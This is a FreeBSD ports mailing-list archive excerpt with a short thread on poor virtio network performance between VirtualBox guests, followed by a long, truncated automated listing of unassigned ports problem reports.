<493200451.1337.1353914357039.JavaMail.root@daemoninthecloset.org> In-Reply-To: <50B2BE05.7090508@wp.pl> Subject: Re: FreeBSD Port: emulators/virtio-kmod - poor performance in VirtualBox MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Originating-IP: [192.168.10.20] X-Mailer: Zimbra 7.2.0_GA_2669 (ZimbraWebClient - GC20 ([unknown])/7.2.0_GA_2669) Cc: ports@freebsd.org, emulation@freebsd.org, kuriyama@FreeBSD.org X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 26 Nov 2012 07:27:29 -0000 Hi, ----- Original Message ----- > From: "Marek Salwerowicz" > To: kuriyama@FreeBSD.org > Cc: ports@freebsd.org, emulation@freebsd.org > Sent: Sunday, November 25, 2012 6:55:33 PM > Subject: FreeBSD Port: emulators/virtio-kmod - poor performance in VirtualBox > > Hi, > > I would like to test the 'intnet' networking mode in VirtualBox 4.2.4 > (under FreeBSD 9.1-PRERELEASE), running 2 VMs with FreeBSD 9.1-RC3 > amd64 > each. > > After installing your port kernel detected the 'virtio' interface and > I > configured the IP on both machines. > > I used the 'ttcp' program to test the network performance between > machines and I noticed that average transfer rate is around 6-7 KB/s > (while using eg. the Intel emulator, |82540EM, it's much better, > around > 100 KB/s) Even 100KB seems a couple of magnitudes slow for the emulated E1000 between 2 guests on the same host. > > Do you have an idea why this is so slow? > Try disabling checksum offloading (and TSO/LRO if Virtualbox supports that). > And why the if_vtnet network driver isn't provided in GENERIC kernel? > Is it still under development? > Getting it in GENERIC is in my plans. My spare time has been distracted at some other Ethernet drivers for the last few weeks. I hope to spend much of my spare time in Dec. on various VirtIO items. Bryan > Regards, > > -- > Marek Salwerowicz > | > _______________________________________________ > freebsd-ports@freebsd.org mailing list > http://lists.freebsd.org/mailman/listinfo/freebsd-ports > To unsubscribe, send any mail to > "freebsd-ports-unsubscribe@freebsd.org" > From owner-freebsd-ports@FreeBSD.ORG Mon Nov 26 10:57:14 2012 Return-Path: Delivered-To: ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 464BDF5A for ; Mon, 26 Nov 2012 10:57:14 +0000 (UTC) (envelope-from marek_sal@wp.pl) Received: from mx3.wp.pl (mx3.wp.pl [212.77.101.7]) by mx1.freebsd.org (Postfix) with ESMTP id B83598FC0C for ; Mon, 26 Nov 2012 10:57:12 +0000 (UTC) Received: (wp-smtpd smtp.wp.pl 30074 invoked from network); 26 Nov 2012 11:57:10 +0100 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=wp.pl; s=1024a; t=1353927430; bh=Kg02wSSgaoxNNYfJRjBCQ5y5mH+/d73W3VKSc9UXB4A=; h=From:To:CC:Subject; b=HEDnCmBC2c9WGbFrhsAerU7G8jjqc/X/OAr9lXRORwX0j2nfw7qA1Ux7JEg5p9rDW uBZ1Ce0f4kEQ2QI3EA06/XwC1nLleyg9LMDaO201wID3LlhKSoej2gKtVZC68wMqIV FOWWbsKlK/rt9OexOuEtIqW/zlWQSyYuCw/Y3KTI= Received: from nat.misal.pl (HELO [127.0.0.1]) (marek_sal@[83.19.131.171]) (envelope-sender ) by smtp.wp.pl (WP-SMTPD) with AES256-SHA encrypted SMTP for ; 26 Nov 2012 11:57:10 +0100 Message-ID: <50B34B05.2000801@wp.pl> Date: Mon, 26 Nov 2012 11:57:09 +0100 From: Marek Salwerowicz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Thunderbird/17.0 MIME-Version: 1.0 To: Bryan Venteicher Subject: Re: FreeBSD Port: emulators/virtio-kmod - poor performance in VirtualBox References: <493200451.1337.1353914357039.JavaMail.root@daemoninthecloset.org> In-Reply-To: <493200451.1337.1353914357039.JavaMail.root@daemoninthecloset.org> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Antivirus: avast! (VPS 121126-0, 2012-11-26), Outbound message X-Antivirus-Status: Clean X-WP-AV: skaner antywirusowy poczty Wirtualnej Polski S. A. X-WP-SPAM: NO 0000000 [oYOk] Cc: ports@freebsd.org, emulation@freebsd.org, kuriyama@FreeBSD.org X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 26 Nov 2012 10:57:14 -0000 W dniu 2012-11-26 08:19, Bryan Venteicher pisze: > Even 100KB seems a couple of magnitudes slow for the emulated E1000 > between 2 guests on the same host. Sorry, I was about to write 100 MB/s, not KB. -- Marek Salwerowicz From owner-freebsd-ports@FreeBSD.ORG Mon Nov 26 10:58:13 2012 Return-Path: Delivered-To: ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 77DB8AC for ; Mon, 26 Nov 2012 10:58:13 +0000 (UTC) (envelope-from marek_sal@wp.pl) Received: from mx4.wp.pl (mx4.wp.pl [212.77.101.8]) by mx1.freebsd.org (Postfix) with ESMTP id E9BB38FC14 for ; Mon, 26 Nov 2012 10:58:12 +0000 (UTC) Received: (wp-smtpd smtp.wp.pl 27249 invoked from network); 26 Nov 2012 11:54:59 +0100 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=wp.pl; s=1024a; t=1353927299; bh=Kg02wSSgaoxNNYfJRjBCQ5y5mH+/d73W3VKSc9UXB4A=; h=From:To:CC:Subject; b=CKnTtrppZiZSU8/9v9R01W45rBQxGO2+3VITavja5y5WmQ7ROO+2iK6JJsj2kCq7w COmIn/BhhwZ3wMIwr1w6og1JJzE7tABc3qu17Hy3kL3UzQW1gTbzlj3CjOd7e5sZ7X TGbZKp4SrY6R5SbtvRr3Vn9azY/PXTOfP8pW2Nps= Received: from nat.misal.pl (HELO [127.0.0.1]) (marek_sal@[83.19.131.171]) (envelope-sender ) by smtp.wp.pl (WP-SMTPD) with AES256-SHA encrypted SMTP for ; 26 Nov 2012 11:54:59 +0100 Message-ID: <50B34A82.7010706@wp.pl> Date: Mon, 26 Nov 2012 11:54:58 +0100 From: Marek Salwerowicz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Thunderbird/17.0 MIME-Version: 1.0 To: Bryan Venteicher Subject: Re: FreeBSD Port: emulators/virtio-kmod - poor performance in VirtualBox References: <493200451.1337.1353914357039.JavaMail.root@daemoninthecloset.org> In-Reply-To: <493200451.1337.1353914357039.JavaMail.root@daemoninthecloset.org> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Antivirus: avast! (VPS 121126-0, 2012-11-26), Outbound message X-Antivirus-Status: Clean X-WP-AV: skaner antywirusowy poczty Wirtualnej Polski S. A. X-WP-SPAM: NO 0000000 [QdMU] Cc: ports@freebsd.org, emulation@freebsd.org, kuriyama@FreeBSD.org X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 26 Nov 2012 10:58:13 -0000 W dniu 2012-11-26 08:19, Bryan Venteicher pisze: > Even 100KB seems a couple of magnitudes slow for the emulated E1000 > between 2 guests on the same host. Sorry, I was about to write 100 MB/s, not KB. -- Marek Salwerowicz From owner-freebsd-ports@FreeBSD.ORG Mon Nov 26 11:06:03 2012 Return-Path: Delivered-To: freebsd-ports@FreeBSD.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id B3E7233D for ; Mon, 26 Nov 2012 11:06:03 +0000 (UTC) (envelope-from owner-bugmaster@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:1900:2254:206c::16:87]) by mx1.freebsd.org (Postfix) with ESMTP id 98A168FC17 for ; Mon, 26 Nov 2012 11:06:03 +0000 (UTC) Received: from freefall.freebsd.org (localhost [127.0.0.1]) by freefall.freebsd.org (8.14.5/8.14.5) with ESMTP id qAQB63SL018486 for ; Mon, 26 Nov 2012 11:06:03 GMT (envelope-from owner-bugmaster@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.14.5/8.14.5/Submit) id qAQB63B8018484 for freebsd-ports@FreeBSD.org; Mon, 26 Nov 2012 11:06:03 GMT (envelope-from owner-bugmaster@FreeBSD.org) Date: Mon, 26 Nov 2012 11:06:03 GMT Message-Id: <201211261106.qAQB63B8018484@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: gnats set sender to owner-bugmaster@FreeBSD.org using -f From: FreeBSD bugmaster To: FreeBSD ports list Subject: Current unassigned ports problem reports X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 26 Nov 2012 11:06:03 -0000 (Note: an HTML version of this report is available at http://www.freebsd.org/cgi/query-pr-summary.cgi?category=ports .) The following is a listing of current problems submitted by FreeBSD users. These represent problem reports covering all versions including experimental development code and obsolete releases. S Tracker Resp. Description -------------------------------------------------------------------------------- o ports/173928 autoconf fails to build o ports/173927 ports/pefs no start/stop script provided with this por o ports/173925 ports/virtualbox-ose-additions-4.1.22 VBoxService shut o ports/173922 [MAINTAINER] www/reviewboard update to 1.6.14 o ports/173920 perl5.16 chokes when building GDBM o ports/173918 [PATCH] deskutils/recoll: update to 1.18.1, take maint o ports/173911 [update]: audio/clementine-player up to latest version o ports/173910 [PATCH] games/robocode: update to 1.7.4.4, take mainta f ports/173904 sysutils/fusefs-kmod build failed with clang'ed 10.0-c o ports/173897 [PATCH] games/palomino: update to 20121026, take maint o ports/173888 [NEW PORT] games/sudoku-sensei: Enjoy playing with Sud o ports/173882 [PATCH] games/xsc: Changed Comment, added Deskop entri o ports/173881 [NEW PORT] games/vodovod: Cross-platform pipe connecti o ports/173880 [PATCH] games/pipenightdreams: Added Portdoss, Desktop o ports/173879 [NEW PORT] games/randomshooter: Destroy as many enemie o ports/173878 [NEW PORT] games/tong: Tetris and Pong in the same pla o ports/173876 [PATCH] games/gtkballs: Added License, OptionsNG, Desk f ports/173875 [PATCH] games/cuyo: update to 2.0.0,1, Added License, o ports/173873 [PATCH] games/barrage: Added license, OptionsNG, Portd o ports/173870 [PATCH] games/frotz: update to 2.43d, take maintainers f ports/173865 devel/boost-all: let Boost to use proper toolset with o ports/173863 A lot operapluginwrapper processes o ports/173862 devel/git-review: Upgrade to 1.20 o ports/173861 [MAINTAINER] dns/powerdns-devel: update to 3.2-RC1 o ports/173860 [maintainer update] security/strongswan 4.5.3 -> 5.0.1 f ports/173858 sysutils/bsdadminscripts installs pkg_libchk that does o ports/173849 [PATCH] deskutils/xwrits: update to 2.26, take maintai f ports/173846 [patch] allow games/jutils to build with openjdk7 o ports/173845 [maintainer update] update lang/basic256 to 0.9.9.17 f ports/173844 [patch] games/jinput: fix build with openjdk7 o ports/173843 [patch] update math/py-matlab from 1.1.1 to 1.2.0 o ports/173836 Update port: graphics/yed: new version 3.10 o ports/173835 [PATCH] astro/viking: update to 1.3.2.1, take maintain o ports/173833 lang/pypy: catch-up description o ports/173826 New Port: print/hplip-plugin o ports/173823 x11/settitle: MASTER_SITES wrong f ports/173820 [PATCH] archivers/rpm5 optionsng f ports/173819 [PATCH] astro/sextractor optionsng f ports/173818 [PATCH] astro/wcslib optionsng f ports/173814 [PATCH] audio/lmms optionsng o ports/173800 [PATCH] audio/gmusicbrowser optionsng o ports/173799 [PATCH] audio/herrice optionsng f ports/173797 [PATCH] audio/gnormalize optionsng f ports/173795 [PATCH] audio/hydrogen optionsng f ports/173789 [PATCH] audio/firefly optionsng f ports/173783 [PATCH] audio/aumix optionsng f ports/173782 [PATCH] audio/clementine-player optionsng f ports/173781 [PATCH] audio/ezstream optionsng f ports/173777 [PATCH] audio/akode optionsng o ports/173765 [MAINTAINER] games/domination: update to 1.1.1.2 o ports/173763 [patch] update deskutils/plasma-applets-cwp from 1.6.6 o ports/173761 [PATCH] games/viruskiller: Added Master site, reset de o ports/173759 [MAINTAINER] audio/libaacplus: fix MASTER_SITES o ports/173757 [maintainer] mail/milter-manager update to 1.8.4 o ports/173756 net-mgmt/argus3 and net-mgmt/argus3-clients - change m o ports/173752 [PATCH] audio/xmms-sid update to 0.8.98.2 o ports/173751 [PATCH] multimedia/gxmms update to 0.3.0 o ports/173750 [PATCH] multimedia/motion fix bktr o ports/173743 Fix build problem for mplayer/mencoder when DEBUG opti o ports/173738 [MAINTAINER] databases/mariadb-server: update to 5.3.1 f ports/173733 [PATCH] devel/py27-fabric: update to 1.5.1,1 f ports/173726 [patch] games/stonesoup o ports/173716 [MAINTAINER] www/pecl-yaf: update to 2.2.7 o ports/173715 [MAINTAINER] sysutils/py27-glances: update to 1.5.1 o ports/173714 update www/py-tornado-2.3 to 2.4 o ports/173713 new port: java/jboss71 o ports/173708 New Port: audio/pyaudio PyAudio provides Python bindin o ports/173706 devel/lmdbg: upgrade to 1.1.0 f ports/173705 [Update] net-p2p/ncdc to 1.14 o ports/173701 devel/bmake: update to 20121111 snapshot f ports/173683 Update port: sysutils/sec to 2.6.2 + fix rc script o ports/173676 [new port] graphics/openshadinglanguage o ports/173674 port update, security/afterglow o ports/173670 port update, security/sguil-client o ports/173668 port update, security/sguil-sensor o ports/173667 port uptdate, security/sguil-server o ports/173654 [MAINTAINER] devel/mingw32-binutils: update to 2.23.1 o ports/173638 [PATCH] Revised check_ircd.pl patch for net-mgmt/nagio f ports/173631 [new port] graphics/converseen o ports/173626 [PATCH] dns/ldns: update to 1.6.16 o ports/173623 [MAINTAINER] databases/mariadb-server: update to 5.3.1 o ports/173618 [NEW PORT] games/blobandconquer: 3D shooter with some o ports/173615 textproc/db2latex 0.8p1_1 has bad xls [patch] f ports/173608 [PATCH] comms/morse: OPTIONSNG & trim Makefile header o ports/173599 multimedia/xbmc maintainer update to 12 alpha 7 f ports/173596 Update version of port net-mgmt/nfdump to 1.6.8 f ports/173594 Update version of port net-mgmt/nfsen to 1.3.6p1 o ports/173593 audio/firefly fails to compile on systems where /usr/b o ports/173590 New ports: textproc/fcitx-m17n and vietnamese/fcitx-un o ports/173581 new port submission, security/sagan f ports/173575 Fix devel/boost-python-libs with python-3.2 o ports/173574 [NEW PORT] www/pecl-solr: An Apache Solr PHP extension o ports/173571 [PATCH] graphics/glfw: update to 2.7.7, take maintaine o ports/173569 [PATCH] graphics/icon-slicer: OptionsNG, shorter pkg-d o ports/173568 Update port: www/py-selenium Upgrade to 2.26.0 o ports/173567 [NEW PORT] www/download-gemist o ports/173566 [maintainer update] net/xrdp: change install-time beha o ports/173564 [Maintainer] www/squid32: enable the kerberos_ldap_gro o ports/173563 [PATCH] benchmarks/super-smack: OPTIONSNG & trim Makef o ports/173562 [Patch] Update audio/cmus to version 2.5.0 f ports/173560 [PATCH] benchmarks/nuttcp: OPTIONSNG, trim Makefile he o ports/173559 "portmaster math/lp_solve" fails when run from normal o ports/173558 conflicting hdf5 when first installing graphics/openim o ports/173552 [PATCH] graphics/fv: OptionsNG o ports/173549 lam version update o ports/173544 [new port] devel/liblognorm, a log normalizer o ports/173543 ucarp / vlan interfaces o ports/173542 [PATCH] graphics/fracplanet: take maintainership, Make o ports/173537 [PATCH] graphics/autoq3d: take maintainership, Makefil o ports/173535 [games/frogatto] update to 1.2 o ports/173534 [NEW PORT] games/wizznic: Implementation of the arcade o ports/173533 mpd5 PPTP server race condition with some clients o ports/173531 [maintainer-update] [patch] devel/dulwich: Update to 0 o ports/173526 xscreensaver rapidly fills Xorg.0.log with (II) lines f ports/173523 [patch] net/bird: adopt optionsNG, trim header o ports/173522 [UPDATE] games/palomino to v20121026 o ports/173518 [PATCH] devel/gengetopt: update to 2.22.6, take mainta f ports/173517 comms/spandsp-devel lacks build dependency for xsltpro o ports/173505 java/java3d does not compile o ports/173504 [PATCH] games/xye: update to 0.12.1, take maintainersh f ports/173496 [UPDATE] sysutils/logrotate: update to 3.8.3, take mai o ports/173493 [NEW PORT] games/blobwars: Mission and Objective based f ports/173490 www/squid32 - missing kerberos helper f ports/173489 [PATCH] databases/mysqltuner: [SUMMARIZE CHANGES] o ports/173464 [PATCH] emulators/linux-pete-mesagpu: update to 1.77, o ports/173463 [PATCH] emulators/linux-peops-softgpu: update to 1.18, o ports/173462 [PATCH] emulators/linux-pete-xgl2gpu: update to 2.9, t o ports/173457 [NEW PORT] games/edgar: 2D platform game with a persis o ports/173456 [MAINTAINER] games/bombherman: Makefile changed, added o ports/173453 graphics/ocaml-images Update to 4.0.1 f ports/173446 lang/polyml: segfaults on startup on amd64 o ports/173438 lang/tuareg-mode.el f ports/173437 japanese/ddskk installation fails o ports/173436 [MAINTAINER] games/mopesnake: Makefile changed, added o ports/173431 [MAINTAINER] games/madbomber: Makefile changed, added o ports/173430 [MAINTAINER] games/krank: Makefile changed, added pkg- o ports/173427 [MAINTAINER] games/iceicepenguin: Makefile changed, ad o ports/173424 [MAINTAINER] games/glightoff: Fixed NLS, removed notes o ports/173422 [MAINTAINER-UPDATE] dns/knot: update to 1.1.1 f ports/173412 failed to install lang/gnat-aux o ports/173402 [MAINTAINER] emulators/swine: Normal download from Git o ports/173397 [MAINTAINER] games/defendguin: Makefile changed, added f ports/173392 Port update for net-mgmt/torrus 2.05 release f ports/173388 [Patch] Update mail/imapsync to version 1.508 f ports/173369 math/gnuplot+: avoid conflicts with math/gnuplot o ports/173368 [PATCH] games/glmaze: OptionsNG, changed Makefile, add o ports/173364 lang/ocaml Update to 4.00.1 f ports/173362 devel/ocaml-calendar Update to 2.03.2 f ports/173360 irc/riece does not depend on Ruby o ports/173356 [MAINTAINER] games/blockrage: Changed Makefile, added o ports/173355 [MAINTAINER] games/black-box: Makefile changed, added o ports/173354 [MAINTAINER] games/barbie_seahorse_adventures: Makefil o ports/173352 [PATCH] games/gtkatlantic: OptionsNG, changed Makefile o ports/173351 [PATCH] games/4stattack: OptionsNG, Makefile simplifie o ports/173350 [PATCH] games/ppracer: OptionsNG, Makefile changed, ta o ports/173349 [MAINTAINER] games/asteroids3d: Changed Makefile, adde o ports/173347 [MAINTAINER] games/BillardGL: Changed Makefile, added o ports/173346 [MAINTAINER] games/netwalk: Changed Makefile, added De o ports/173345 [MAINTAINER] games/nelly: Changed Makefile, nelly.in, o ports/173339 graphics/ImageMagick Port tries to build the universe o ports/173335 [PATCH] games/xarchon: OptionsNG, changed Makefile, pk o ports/173314 [PATCH] graphics/comix: OptionsNG, changed Makefile, p o ports/173304 libxcb breaks other applications runtine/build f ports/173303 sysutils/fusefs-kmod does not build with ruby 1.9 o ports/173294 [NEW PORT] graphics/cbviewer: Comic book viewer for co o ports/173293 [PATCH] graphics/cbview: Makefile changed, OptionsNG, o ports/173292 [PATCH] graphics/cbrpager: Makefile changed, OptionsNG o ports/173282 New port: security/keepassx2 Cross Platform Password M o ports/173272 [MAINTAINER] games/asteroids3d: Fixed distfiles for Di o ports/173271 [MAINTAINER] games/kye: Fixed distfiles for Distilator o ports/173268 [PATCH] graphics/cadubi: Makefile changed, OptionsNG, o ports/173253 [bsd.sites.mk] Fix some broken links o ports/173246 maintainer update: sysutils/condor o ports/173241 devel/pmd fails to install f ports/173230 sysutils/parallel 20121022 complains about defined(@ar o ports/173194 [new port] java/eclipse-birt: BIRT plugin for Eclipse f ports/173191 lang/squeak: invalid dependency. o ports/173188 [PATCH] games/wordplay: Makefile changed, OptionsNG, t o ports/173184 [PATCH] games/abe: Makefile changed, removed pkg-plist o ports/173179 [PATCH] games/aop: Makefile changed, OptionsNG, take m o ports/173176 [PATCH] games/lmarbles: Makefile changed, OptionsNG, t o ports/173164 [MAINTAINER] devel/mingw32-gcc: update to 4.7.2 o ports/173159 net/heybuddy port upgrade to version 0.2.4 f ports/173131 www/openbravoerp: remove tomcat55 dependency (eol soon o ports/173112 [update] multimedia/qmmp support 4 ports of ffmpeg o ports/173079 [NEW PORT] databases/pyspatialite Python interface to o ports/173076 New Port: sysutils/jail another rc-script for jails, t f ports/173051 emulators/hercules update from 3.05 to 3.07 o ports/173040 net-mgmt/argus3, port update o ports/173036 net-mgmt/argus3-clients, update o ports/173034 update to security/kpcli v. 1.5, .kdbx support added o ports/173033 update to ver. 2.03, containing some new features o kern/173030 [atf] [patch] emulators/open-vm-tools: fix clang compi o ports/173001 New port: x11/deforaos-desktop (15/15) o ports/173000 New port: mail/deforaos-Mailer (10/15) o ports/172999 New port: print/deforaos-PDFViewer (11/15) o ports/172998 New port: comms/deforaos-Phone (14/15) o ports/172997 New port: deskutils/deforaos-Todo (12/15) o ports/172996 New port: multimedia/deforaos-Player (13/15) o ports/172995 new port: editors/deforaos-Editor (8/15) o ports/172994 new port: x11/deforaos-Locker 6/15 o ports/172993 new port: audio/deforaos-Mixer (7/15) o ports/172992 New port: www/deforaos-Surfer (9/15) o ports/172991 new port: x11/deforaos-Panel (5/15) o ports/172990 new port: x11/deforaos-Keyboard (4/15) o ports/172989 new port: x11/deforaos-libDesktop, 2/15 o ports/172988 new port: x11/deforaos-Browser, 3/15 o ports/172987 New port: devel/deforaos-libSystem o ports/172982 [UPDATE] audio/linnya: update to 2.3.0 o ports/172981 [NEW PORT] devel/allegro-devel5: Cross-platform librar o ports/172967 asterisk-gui port for asterisk 1.6 to asterisk 11 o ports/172964 USE_GITHUB feature not fully implemented o ports/172950 [PATCH] irc/psybnc update to 2.4-BETA1 o ports/172944 [NEW PORT] games/oneisenough: Economic development in o ports/172943 [PATCH] security/pear-Auth_PrefManager: update to 1.2. o ports/172941 [PATCH] security/pam_ssh_agent_auth: update to 0.9.4 o ports/172934 [PATCH] games/whichwayisup: Makefile changed, OptionsN f ports/172929 www/hastymail2 update to 1.1 final from beta o ports/172923 [PATCH] irc/p5-Parse-IRC: update to 1.20 o ports/172912 [MAINTAINER PATCH]: devel/dbus-qt3 Code cleanup o ports/172904 [PATCH] graphics/pear-Image_3D: update to 0.4.2 o ports/172900 New port: security/regripperplugins o ports/172899 New port: security/regripper o ports/172887 [PATCH] games/nuclearchess: Makefile changed, OptionsN o ports/172885 New port: misc/fbless text-mode fb2 books reader o ports/172866 [PATCH] games/icebreaker: update to 1.9.5, take mainta o ports/172863 [NEW PORT] net/pjsip: Multimedia communication library f ports/172837 lang/swi-pl compiles with databases/libiodbc o ports/172811 tcl86 conflicts with open-motif f ports/172800 [PATCH] fix build/install for audio/hydrogen o ports/172793 maintainer: copy net/xrdp to net/xrdp-devel, update to o ports/172781 [NEW PORT] multimedia/libcec : library allowing you to o ports/172780 New port: net/afpfs-ng an Apple Filing Protocol client o ports/172779 [PATCH] devel/pear-PHPUnit3: update to 3.7.6 o ports/172777 New port: net/libnfs a client library for accessing NF o ports/172775 New port: audio/libshairport a library for Airport Ext o ports/172774 [NEW PORT] devel/pear-SebastianBergmann_PHPCPD: Copy/P o ports/172772 [NEW PORT] devel/pear-SebastianBergmann_FinderFacade: o ports/172771 [NEW PORT] devel/pear-Symfony_Component_Finder: Symfon f ports/172770 [NEW PORT] devel/pear-Symfony_Component_Yaml: Symfony2 o ports/172768 [NEW PORT] devel/pear-SebastianBergmann_PHPLOC: A tool o ports/172767 [NEW PORT] devel/pear-TheSeer_phpDox: A php Documentat o ports/172766 [NEW PORT] devel/pear-TheSeer_fXSL: An XSL wrapper / e o ports/172765 [NEW PORT] devel/pear-TheSeer_fDOMDocument: An Extensi o ports/172764 [NEW PORT] devel/pear-pdepend-staticReflection: The st o ports/172763 [NEW PORT] devel/pear-ezc_ConsoleTools: A set of class o ports/172762 [NEW PORT] devel/pear-TheSeer_DirectoryScanner: A recu o ports/172761 [NEW PORT] devel/pear-PHP_PMD: PHP Mess Detector o ports/172760 [NEW PORT] devel/pear-PHP_Depend: PHP_Depend design qu o ports/172759 [NEW PORT] devel/pear-ezc_Base: The Base package that o ports/172758 [NEW PORT] devel/pear-channel-phpmd: PEAR channel pear o ports/172757 [NEW PORT] devel/pear-channel-ezc: PEAR channel compon o ports/172756 [NEW PORT] devel/pear-channel-theseer: PEAR channel pe o ports/172755 [NEW PORT] devel/pear-channel-pdepend: PEAR channel pe o ports/172753 [PATCH] devel/pear-PHP_CodeSniffer: update to 1.4.0 f ports/172750 graphics/luminance does not compile if graphics/libraw o ports/172745 The port sessreg does not compile in 9.1-PRERELEASE #2 o ports/172725 japanese/skk-tools: Fix build with clang o ports/172724 cad/gnucap: Fix build with clang o ports/172720 graphics/vcg: Fix build with clang o ports/172717 graphics/urt: Fix build with clang f ports/172713 ports-mgmt/portbuilder hangs building x11/xorg on i386 f ports/172707 Fix sysutils/ipmitool build on big endian architecture o ports/172696 [new port][patch] databases/mysq56 f ports/172689 Problem building emulators/hercules + patch o ports/172688 audio/gmpc 11.8.16: playback buttons don't have icons o ports/172679 [PATCH] games/pyawale: Makefile clearly, simplified, O o ports/172678 [PATCH] audio/portaudio: update to 19.20111121, take m f ports/172668 [PATCH] databases/mtop: Patch for MySQL version detect o ports/172628 cannot build ports/INDEX f ports/172600 [PKGNG]sysutils/bacula-client & sysutils/bacula-server o ports/172595 New port: net-p2p/pushpoold bitcoin push-mining pool s f ports/172552 [PATCH] multimedia/motion bktr driver not work after p o ports/172547 bsd.destdir.mk fails when DESTDIR is set o ports/172513 x11-clocks/dclock: Update to version 2.2.2 o ports/172511 x11/lupe: Update MASTER_SITES o ports/172509 sysutils/am-utils: Update MASTER_SITES f ports/172506 games/anki: Update to version 2.0.0 o ports/172505 graphics/pngquant: Update to version 1.7.3 o ports/172504 devel/subcommander2: Update to version 2.0.0.b5.2 o ports/172503 devel/xxl: Update MASTER_SITES o ports/172501 devel/autodia: Update to version 2.14 o ports/172499 biology/t_coffee: Update to version 9.03 o ports/172496 biology/blat: Update to version 35 o ports/172491 [NEW PORT] devel/pecl-test_helpers: An extension to ea f ports/172477 [UPDATE] www/wordpress: Trim the headers f ports/172473 Fix for broken net/libtrace port o ports/172463 [patch update] databases/freetds-devel to OPTIONSng an f ports/172441 chinese/fcitx should be in 'textproc' instead of 'chin o ports/172439 [New Port] chinese/fcitx-table-yonh: Pinyin-like input o ports/172438 [PATCH] net/xorp-devel: Converting port to new options o ports/172416 Building multimedia/mplayer on 9.1-PRERELEASE errors w o ports/172415 New port: net/lualdap f ports/172391 multimedia/xbmc -- no man page f ports/172365 [PATCH]: x11/slim Fix ConsoleKit support o ports/172361 lang/gnustep-base fail to configure with clang f ports/172353 multimedia/mencoder does not build with clang on amd64 o ports/172331 [PATCH] games/castlevox: Makefile changed, OptionsNG, o ports/172319 [MAINTAINER] www/MT,russian/MT: update to 5.2 f ports/172304 sysutils/conky: memory leak and complete system freeze o ports/172298 [patch] 7 R-cran ports: finance/R-cran-fBasics finance f ports/172272 www/speedtest-mini - port not working f ports/172242 mail/popfile: Update to vesion 1.1.3 o ports/172240 graphics/sane-frontends: Update MASTER_SITES o ports/172236 devel/ocaml-xstrp4: Update to version 1.8 o ports/172235 devel/ocaml-xstr: Update MASTER_SITES o ports/172234 devel/ocaml-typeconv: Update to version 108.07.00 o ports/172233 devel/ocaml-sdl: Update to version 0.9.1 o ports/172232 devel/ocaml-sexplib: Update to version 108.07.00 o ports/172231 devel/ocaml-res: Update to version 4.0.2 o ports/172230 devel/ocaml-pomap: Update to version 3.0.1 o ports/172229 devel/ocaml-lacaml: Update to version 7.0.3 o ports/172228 devel/ocaml-extlib: Update to version 1.5.3 o ports/172226 devel/libthai: Update MASTER_SITES o ports/172225 devel/ocaml-cfg: Update to version 2.0.1 o ports/172223 devel/aifad: Update to version 2.0.2 o ports/172168 [new port] comms/libdlo: the basis for the DisplayPort f ports/172147 sysutils/isomd5sum build fails with clang f ports/172141 [PATCH] deskutils/q4wine: update to 0.121, OptionsNG, f ports/172139 www/squid31 f ports/172078 [patch] Fix distfile for multimedia/mplayer-skins o ports/172073 x11-wm/treewm: Support CFLAGS properly o ports/172072 x11-wm/ede: Fix build o ports/172066 shells/esh: Update MASTER_SITES o ports/172059 security/secure_delete: Update MASTER_SITES o ports/172057 security/manipulate_data: Update MASTER_SITES o ports/172052 science/hdf: Update to version 4.2.8 o ports/172039 net/enet: Update to version 1.3.5 o ports/172029 mail/abook: Support USE_READLINE o ports/172028 lang/mdk: Support USE_READLINE o ports/172027 lang/gcl: Support USE_READLINE o ports/172022 graphics/sane-backends: Update to version 1.0.23 o ports/172011 graphics/OpenEXR: Update to version 1.7.1 o ports/172010 games/xevil: Update MASTER_SITES o ports/172008 games/ultimatestunts: Update to version 0.7.7.1 o ports/172006 games/stepmania-devel: Update to version 5.0.a3 o ports/172003 games/kbilliards: Fix build o ports/172000 ftp/quftp: Support USE_READLINE o ports/171999 ftp/ncftp2: Support USE_READLINE o ports/171998 ftp/hsftp: Support USE_READLINE o ports/171991 editors/uemacs: Update MASTER_SITES o ports/171989 devel/rudiments: Update to version 0.37 o ports/171988 devel/omake: Update MASTER_SITES o ports/171985 devel/jtag: Support USE_READLINE o ports/171975 databases/sqsh: Support USE_READLINE o ports/171974 databases/grass: Support USE_READLINE o ports/171962 audio/lash: Support USE_READLINE o ports/171961 audio/icecast: Support USE_READLINE o ports/171959 audio/ecasound: Support USE_READLINE o ports/171951 update port: security/fwknop FireWall KNock OPerator f ports/171950 devel/tnt: include/tnt/tnt_sparse_matrix_csr.h:97:3: e o ports/171945 